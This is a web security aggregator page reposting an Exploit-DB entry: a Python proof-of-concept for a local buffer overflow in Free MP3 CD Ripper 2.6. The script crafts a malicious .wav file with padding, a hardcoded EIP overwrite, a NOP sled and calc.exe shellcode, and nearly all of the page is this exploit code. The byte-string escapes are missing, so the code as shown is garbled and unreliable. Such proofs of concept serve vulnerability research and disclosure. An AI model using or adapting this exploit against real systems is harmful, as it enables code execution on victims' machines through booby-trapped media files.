HackDig : Dig high-quality web security articles for hacker

Free MP3 CD Ripper 2.6 - Local Buffer Overflow

2015-03-24 18:25
#!/usr/bin/python

#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: Free MP3 CD Ripper All versions Local Buffer Overflow
#[+] Date: 20-03-2015
#[+] Type: Local Exploits
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor: http://www.commentcamarche.net/download/telecharger-34082200-free-mp3-cd-ripper
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R

## EDB Note: Didn't work with Windows 7.

from struct import pack
file="evilfile.wav"
junk="x41"*4112
eip = pack('<I',0x7C9D30D7)
nops = "x90" * 3
#Calc.exe Shellcode
#POC:http://youtu.be/_uvHKonqO2g
shellcode = ("xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1x1ex58x31x78"
"x18x83xe8xfcx03x78x68xf4x85x30x78xbcx65xc9x78xb6x23xf5xf3"
"xb4xaex7dx02xaax3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96"
"x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6bxf0x27xddx48xfd"
"x22x38x1bxa2xe8xc3xf7x3bx7axcfx4cx4fx23xd3x53xa4x57xf7xd8"
"x3bx83x8ex83x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98xf5"
"xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61xb6x0ex2fx85x19x87"
"xb7x78x2fx59x90x7bxd7x05x7fxe8x7bxca")
writeFile = open (file, "w")
writeFile.write(junk+eip+nops+shellcode)
writeFile.close()




Source: 56463/stiolpxe/moc.bd-tiolpxe.www

Read:2023 | Comments:0 | Tags:local

“Free MP3 CD Ripper 2.6 - Local Buffer Overflow”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Announce

Share high-quality web security related articles with you:)

Tools

Tag Cloud